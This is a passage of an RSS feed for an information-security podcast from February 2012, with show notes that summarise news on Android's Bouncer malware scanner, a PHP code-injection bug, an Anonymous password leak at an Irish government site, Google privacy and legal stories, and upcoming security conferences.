	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><a href="http://howto.cnet.com/8301-11310_39-57368016-285/how-to-prevent-google-from-tracking-you/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></a></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://www.forbes.com/sites/andygreenberg/2012/02/02/google-gets-serious-about-android-security-now-auto-scans-app-market-for-malware/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.forbes.com/sites/andygreenberg/2012/02/02/google-gets-serious-about-android-security-now-auto-scans-app-market-for-malware/</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><a href="http://howto.cnet.com/8301-11310_39-57368016-285/how-to-prevent-google-from-tracking-you/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></a><a href="http://googlemobile.blogspot.com/2012/02/android-and-security.html"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://googlemobile.blogspot.com/2012/02/android-and-security.html </span></a></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The last year has been a phenomenal one for the Android ecosystem. Device activations grew 250% year-on-year, and the total number of app downloads from Android Market topped 11 billion. As the platform continues to grow, we&rsquo;re focused on bringing you the best new features and innovations &#8211; including in security.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Today we&rsquo;re revealing a service we&rsquo;ve developed, codenamed Bouncer, which provides automated scanning of Android Market for potentially malicious software without disrupting the user experience of Android Market or requiring developers to go through an application approval process.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The service performs a set of analyses on new applications, applications already in Android Market, and developer accounts. Here&rsquo;s how it works: once an application is uploaded, the service immediately starts analyzing it for known malware, spyware and trojans. It also looks for behaviors that indicate an application might be misbehaving, and compares it against previously analyzed apps to detect possible red flags. We actually run every application on Google&rsquo;s cloud infrastructure and simulate how it will run on an Android device to look for hidden, malicious behavior. We also analyze new developer accounts to help prevent malicious and repeat-offending developers from coming back. </span></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><a href="http://howto.cnet.com/8301-11310_39-57368016-285/how-to-prevent-google-from-tracking-you/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://www.h-online.com/security/news/item/Critical-PHP-vulnerability-being-fixed-1427316.html"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.h-online.com/security/news/item/Critical-PHP-vulnerability-being-fixed-1427316.html</span></a></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The PHP developers are working to fix a critical security vulnerability in PHP that they introduced with a recent security patch. The current stable release is affected; however, it is not yet clear whether the questionable patch was also applied to older versions.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The cause of the problem is the security update to PHP 5.3.9, which was written to prevent denial of service (DoS) attacks using hash collisions. To do so, the developers limited the maximum possible number of input parameters to 1,000 in php_variables.c using max_input_vars. Because of mistakes in the implementation, hackers can intentionally exceed this limit and inject and execute code. The bug is considered to be critical as code can be remotely injected over the web.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><a href="http://howto.cnet.com/8301-11310_39-57368016-285/how-to-prevent-google-from-tracking-you/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></a><a href="http://news.softpedia.com/news/Anonymous-Leaks-Passwords-from-Ireland-s-Foreign-Affairs-Site-250514.shtml"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.softpedia.com/news/Anonymous-Leaks-Passwords-from-Ireland-s-Foreign-Affairs-Site-250514.shtml</span></a></p>
<p>&nbsp;</p>
<div dir="ltr">
<table style="border:none;border-collapse:collapse">
<colgroup>
<col width="125" /></colgroup>
</table>
</div>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Anonymous hackers managed to gain access to the official website of the Irish government&rsquo;s Department of Foreign Affairs, obtaining passwords used by employees and officials. Some of the passwords were used to administrate the website Irish Aid, an overseas development program.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to</span><a href="http://www.thejournal.ie/government-website-passwords-obtained-by-anonymous-hacker-343904-Feb2012/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">The Journal</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, members of Anonymous Sweden led to believe that these attacks, part of OpIreland, were launched as a protest against the plans to introduce a new SOPA-like legislation.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Of the 19 credential sets leaked, 17 were used by the Department of Foreign Affairs to edit the Irish Aid website, while the other 2 were utilized by the staffers of the company that developed the site.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;We are aware of website user login information being posted online. The website server has been taken offline as a precautionary measure and the matter is being investigated by our IT specialists,&rdquo; said a Department of Foreign Affairs spokeswoman.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;This is an external service and is separate to the internal Department servers; these have not been affected.&rdquo;</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It seems that Se&aacute;n Sherlock, the junior minister behind the new law, is one of the main targets, Anonymous revealing that it plans on targeting the Labour Party&rsquo;s website next, part of which Sherlock is a member.</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><a href="http://howto.cnet.com/8301-11310_39-57368016-285/how-to-prevent-google-from-tracking-you/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></a><a href="http://news.cnet.com/8301-27080_3-57370710-245/how-to-identify-fake-facebook-accounts"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.cnet.com/8301-27080_3-57370710-245/how-to-identify-fake-facebook-accounts</span></a></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hello, Facebook friends, I am male, straight, often ridiculously good-looking, and this is a real message: she&#39;s not that into you.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">And by she, I mean one of those hot girls on Facebook who always seems too desperate and overzealous in trying to connect to you and everyone on your friend list.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Apparently, of some 850 million active Facebook users, a lot are fake profiles created to spread spam and viruses. These are often categorized as spammers or attackers. Security firm Barracuda Networks released today the findings from its most recent study that helps distinguish attackers from real users. Here are the study&#39;s four key findings.</span></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://news.softpedia.com/news/Anonymous-Leaks-Passwords-from-Ireland-s-Foreign-Affairs-Site-250514.shtml"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.softpedia.com/news/Anonymous-Leaks-Passwords-from-Ireland-s-Foreign-Affairs-Site-250514.shtml</span></a></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Anonymous hackers managed to gain access to the official website of the Irish government&rsquo;s Department of Foreign Affairs, obtaining passwords used by employees and officials. Some of the passwords were used to administrate the website Irish Aid, an overseas development program.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to The Journal, members of Anonymous Sweden led to believe that these attacks, part of OpIreland, were launched as a protest against the plans to introduce a new SOPA-like legislation.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Of the 19 credential sets leaked, 17 were used by the Department of Foreign Affairs to edit the Irish Aid website, while the other 2 were utilized by the staffers of the company that developed the site.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;We are aware of website user login information being posted online. The website server has been taken offline as a precautionary measure and the matter is being investigated by our IT specialists,&rdquo; said a Department of Foreign Affairs spokeswoman.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;This is an external service and is separate to the internal Department servers; these have not been affected.&rdquo;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It seems that Se&aacute;n Sherlock, the junior minister behind the new law, is one of the main targets, Anonymous revealing that it plans on targeting the Labour Party&rsquo;s website next, part of which Sherlock is a member.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">At press time, the website of the Department of Foreign Affairs in back online, but Irish Aid displays a message that reveals they&rsquo;re currently &ldquo;undergoing essential maintenance.&rdquo;</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="https://www.eff.org/deeplinks/2012/02/what-actually-changed-google%27s-privacy-policy"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://www.eff.org/deephttps://www.eff.org/deeplinks/2012/02/what-actually-changed-google%27s-privacy-policylinks/2012/02/what-actually-changed-google%27s-privacy-policy</span></a></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Last week, Google announced a new, simplified privacy policy. They did a great job of informing users that the privacy policy had been changed through emails and notifications, and several experts (including Ontario&rsquo;s Privacy Commissioner Dr. Ann Cavoukian) have praised the shift toward a simpler, more unified policy. Unfortunately, while the policy might be easier to understand, Google did a less impressive job of publicly explaining what in the policy had actually been changed. &nbsp;In fact, it took a letter from eight Representatives to persuade them to provide straightforward answers to the public about their new policy.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://news.cnet.com/8301-13506_3-57370274-17/google-must-pay-$660000-for-offering-google-maps-for-free/?tag=rtcol;dis"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.cnet.com/8301-13506_3-57370274-17/google-must-pay-$660000-for-offering-google-maps-for-free/?tag=rtcol;dis</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A Paris court earlier this week ordered Google France and its parent company Google to pay plaintiff Bottin Cartographes 500,000 euros (about $660,000) for providing its free mapping services to businesses across the country. The court also required Google to pay a 15,000 euro fine for its practice.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;We proved the illegality of (Google&#39;s) strategy to remove its competitors,&quot; Jean-David Scemmama, attorney for Bottin Cartographes, a company that provides mapping services to businesses,</span><a href="http://www.google.com/hostednews/afp/article/ALeqM5hpu8TuRZEBjM30sFn8c7QvMWNjXA?docId=CNG.108b2dd2393721c4759b1eec0730b297.171"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">told the AFP in an interview earlier this week</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">. &quot;The court recognized the unfair and abusive character of the methods used, and allocated Bottin Cartographes all it claimed. This is the first time Google has been convicted for its Google Maps application.&quot;</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to Scemmama, Bottin has been arguing its case against Google for two years, claiming the search giant was engaging in anticompetitive practices by using its free service to take control over the online-mapping industry.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In a statement to the AFP, Google said that it will appeal the court&#39;s decision, adding that Google Maps is still facing competition in that market.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&#8230;</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-585-eyes-open-bouncer-php-nato-deficiencies-fakebook-accounts-whats-new/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3457/0/infosec-daily-podcast-episode-585.mp3" length="20614669" type="audio/mpeg" />
		<itunes:duration>0:42:54</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 585 for February 3, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, and Dr. Bonez,
	&#160;
Announcements:
Unsung Heros
Have you ever stumbled on a tool and w[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 585 for February 3, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, and Dr. Bonez,
	&#160;
Announcements:
Unsung Heros
Have you ever stumbled on a tool and wondered &#8220;Why didn&#8217;t I know this existed!&#8221; or &#8220;If only I&#8217;d had this last week on that test&#8221;&#8230; Chris John Riley has started to gather suggestions for your &#8220;unsung hero&#8221; of the tools world. &#160;He is looking specifically to gather a list of tools that aren&#8217;t on every penetration testers, or forensic investigators list, but that you have respect for. &#160;http://blog.c22.cc/2012/01/13/unsung-heros

	Information Security Blogger Awards 2012
	Since we were over looked again for the Best Podcast on Security you can email ashimmy@hotmail.com with your name, email address and ISD Podcast as your write-in nominee. &#160;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &#160;Vote for your favorite blogs as well on http://www.ashimmy.com.
	Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital ever since.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	Metasploit Framework Unleashed Cincinnati
	When: February 11, 2012. 
	Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&#8217;s College of Informatics
	https://msfucincy.wordpress.com/
	$20 donation for #HFC
	Social Engineering Training
	When: March 5-9, 2012
	Where: Seattle, Washington
	When: July 21-24, 2012
	Where: Black Hat Vegas
	When: August 20-24, 2012
	Where: &#160;Bristol, UK
	When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD 
	http://www.social-engineer.com/social-engineer-training
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	CFP now open!
	LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
	CFP now open!
	DerbyCon 2012 &#8211; The &#8220;Deuce&#8221; Reunion
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	&#160;
Stories
	Source: 
http://www.forbes.com/sites/andygreenberg/2012/02/02/google-gets-serious-about-android-security-now-auto-scans-app-market-for-malware/ 
&#160;
Source: http://googlemobile.blogspot.com/2012/02/android-and-security.html 

	The last year has been a phenomenal one for the Android ecosystem. Device activations grew 250% year-on-year, and the total number of app downloads from Android Market topped 11 billion. As the platform continues to grow, we&#8217;re focused on bringing you the best new features and innovations &#8211; including in security.
	Today we&#8217;re revealing a service we&#8217;ve developed, codenamed Bouncer, which provides automated scanning of Android Market for potentially malicious software without disrupting the user experience of Android Market or requiring develo[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 584 &#8211; OS X 10.7.3, HTC WiFi Oops!, Leading Hackers, Passware &amp; VeriSign</title>
		<link>http://www.isdpodcast.com/episode-584-episode-584-os-x-10-7-3-htc-wifi-oops-leading-hackers-passware-verisign</link>
		<comments>http://www.isdpodcast.com/episode-584-episode-584-os-x-10-7-3-htc-wifi-oops-leading-hackers-passware-verisign#comments</comments>
		<pubDate>Fri, 03 Feb 2012 01:47:24 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3452</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 584 for February 2, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Adrian Crenshaw, and Karthik Rangarajan. &#160; Announcements: Unsung Heros Have you ever stumbled on a tool and wondered &#8220;Why didn&#8217;t I know this existed!&#8221; or &#8220;If only I&#8217;d had this last week on that test&#8221;&#8230; Chris John [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 584 for February 2, 2012. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Adrian Crenshaw, and Karthik Rangarajan.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Unsung Heros</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Have you ever stumbled on a tool and wondered &ldquo;Why didn&rsquo;t I know this existed!&rdquo; or &ldquo;If only I&rsquo;d had this last week on that test&rdquo;&hellip; Chris John Riley has started to gather suggestions for your &ldquo;unsung hero&rdquo; of the tools world. &nbsp;He is looking specifically to gather a list of tools that aren&rsquo;t on every penetration testers, or forensic investigators list, but that you have respect for. &nbsp;</span><a href="http://blog.c22.cc/2012/01/13/unsung-heros"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blog.c22.cc/2012/01/13/unsung-heros</span></a></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Information Security Blogger Awards 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Since we were over looked again for the Best Podcast on Security </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">you can email </span><a href="mailto:ashimmy@hotmail.com"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">ashimmy@hotmail.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> with your name, email address and ISD Podcast as your write-in nominee. &nbsp;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &nbsp;Vote for your favorite blogs as well on </span><a href="http://www.ashimmy.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.ashimmy.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital ever since.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
